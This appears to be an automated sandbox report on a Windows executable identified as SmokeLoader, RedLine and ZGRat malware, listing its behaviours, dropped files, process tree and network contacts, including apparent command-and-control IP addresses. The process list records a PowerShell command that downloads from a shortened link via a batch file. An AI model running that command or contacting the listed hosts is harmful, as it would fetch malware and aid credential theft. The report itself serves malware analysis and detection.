Analysis Overview
SHA256
bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367
Threat Level: Known bad
The file b67151e07936533f3b38355566e47650.exe was found to be: Known bad.
Malicious Activity Summary
ZGRat
SmokeLoader
RedLine
Detect ZGRat V1
Smokeloader family
RedLine payload
Downloads MZ/PE file
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Deletes itself
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:48
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:48
Reported
2023-12-18 21:51
Platform
win7-20231215-en
Max time kernel
27s
Max time network
51s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\7946.exe
C:\Users\Admin\AppData\Local\Temp\7946.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\7946.exe
C:\Users\Admin\AppData\Local\Temp\7946.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
\Users\Admin\AppData\Local\Temp\nsy7A4F.tmp\Math.dll
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
\Users\Admin\AppData\Local\Temp\tuc3.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
\Users\Admin\AppData\Local\Temp\nsy7A4F.tmp\INetC.dll
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:48
Reported
2023-12-18 21:51
Platform
win10v2004-20231215-en
Max time kernel
46s
Max time network
85s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F63.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3092 set thread context of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\4F63.exe
C:\Users\Admin\AppData\Local\Temp\4F63.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\96EE.exe
C:\Users\Admin\AppData\Local\Temp\96EE.exe
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\A680.exe
C:\Users\Admin\AppData\Local\Temp\A680.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.25.253:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.25.5.3.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\4F63.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
C:\Users\Admin\AppData\Local\Temp\96EE.exe
C:\Users\Admin\AppData\Local\Temp\96EE.exe
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe